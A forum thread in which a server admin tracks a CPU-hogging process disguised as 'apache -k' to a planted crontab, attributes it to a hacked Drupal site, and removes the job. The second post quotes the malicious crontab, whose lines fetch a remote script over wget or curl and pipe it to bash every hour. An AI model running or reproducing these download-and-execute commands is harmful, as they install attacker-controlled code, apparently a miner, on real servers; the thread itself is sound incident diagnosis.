High CPU usage process issue (apache -k) - SOLVED

Discussion in 'Installation/Configuration' started by zion, Oct 10, 2019.

  1. zion

    zion Member

    Hi all,
    I have a webserver where I see a process in top which shows 300% %CPU usage.
    Code:
    # ps aux | grep web821
web821   28051  399  0.0 427828 11648 ?        Ssl  19:01  21:46 apache -k
    I've been disabled all Websites and Subdomain (vhosts) which are related to this web821 user.
    Code:
    # ls -l /home/| grep web821
lrwxrwxrwx   1 root         root           31 Nov 22  2018 dev.***.tld -> /home/clients/client138/web821/
lrwxrwxrwx   1 root         root           31 Sep  5  2014 ***.tld -> /home/clients/client138/web821/
lrwxrwxrwx   1 root         root           31 Jun 19  2016 new.***.tld -> /home/clients/client138/web821/
    Code:
    # ls -l /etc/apache2/sites-enabled/| grep ***
    I killed each process where the user is web821 with kill command, but this stange "apache -k" process appears again and again.
    I have no idea where is this "apache -k" command comes from with web821 user.
    Can you please help me how to find the cause of this issue?
    Code:
    Debian 8.11
Apache/2.4.10 (Debian)
    Thank you in advance,
    Gyula
     
    Last edited: Oct 11, 2019
    zion, Oct 10, 2019
    #1
  2. zion

    zion Member

    I've create a little script which cheks the processlist every minute, kills this bad process then writes the actual time to a log file. The log file looks like this now:
    Code:
    Thu Oct 10 22:02:18 CEST 2019
Thu Oct 10 23:02:01 CEST 2019
Fri Oct 11 00:02:01 CEST 2019
Fri Oct 11 01:02:01 CEST 2019
Fri Oct 11 02:02:01 CEST 2019
Fri Oct 11 03:03:01 CEST 2019
Fri Oct 11 04:02:01 CEST 2019
Fri Oct 11 05:02:01 CEST 2019
Fri Oct 11 06:02:01 CEST 2019
    Then I've found this in /var/spool/cron/crontabs/:
    Code:
    # DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Fri Oct 11 06:01:01 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
1 * * * * wget -O- repo-linux.com/a | bash -
1 * * * * (wget -q http://157.245.235.139/s/xminstall -O - || curl -fs http://157.245.235.139/s/xminstall)|bash
/var/spool/cron/crontabs/web821 (END)
    I've seen this bad process at first yesterday, but this file looks like it was installed today on Fri Oct 11 06:01:01 2019.
    I haven't found the master of this file in /etc/crontab or in /etc/cron.d/ or in crontab yet... but I've found this:
    https://www.reddit.com/r/sysadmin/comments/8garvk/check_your_cronjobs_examining_a_drupal_7_hacked/
    To be continued...
     
    zion, Oct 11, 2019
    #2
  3. zion

    zion Member

    OK, so this Drupal website was hacked. I told to the owener of the website to update the modules and check the files in his development environment before I will enable it again.
    I've been removed this cronjob from /var/spool/cron/crontabs/ with command 'crontab -u web821 -r' because I haven't found the master of it and this apache -k command didn't appear in process list again.
     
    zion, Oct 11, 2019
    #3
    Jesse Norell likes this.

Share This Page